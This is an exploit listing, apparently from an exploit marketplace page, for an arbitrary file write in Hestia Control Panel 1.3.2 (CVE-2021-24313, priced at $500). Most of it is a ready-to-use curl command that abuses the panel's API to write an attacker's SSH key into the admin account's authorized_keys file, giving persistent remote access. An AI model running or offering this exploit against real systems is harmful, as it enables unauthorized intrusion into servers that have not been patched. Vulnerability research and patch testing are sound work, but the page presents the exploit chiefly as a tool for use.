Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-24313 | CWE-22 | $500 | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unnamed | Critical | Remote | 2021-03-18 |
# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write # Date: 07.03.2021 # Author: Numan Trle # Vendor Homepage: https://hestiacp.com/ # Software Link: https://github.com/hestiacp/hestiacp # Version: < 1.3.3 # Tested on: HestiaCP Version 1.3.2 curl --location --request POST 'https://TARGET:8083/api/index.php' \ --form 'hash="HERE_API_KEY"' \ --form 'returncode="yes"' \ --form 'cmd="v-make-tmp-file"' \ --form 'arg1="ssh-rsa HERE_KEY"' \ --form 'arg2="/home/admin/.ssh/authorized_keys"' \ --form 'arg3=""' \ --form 'arg4=""' \ --form 'arg5=""'
Copyright ©2024 Exploitalert.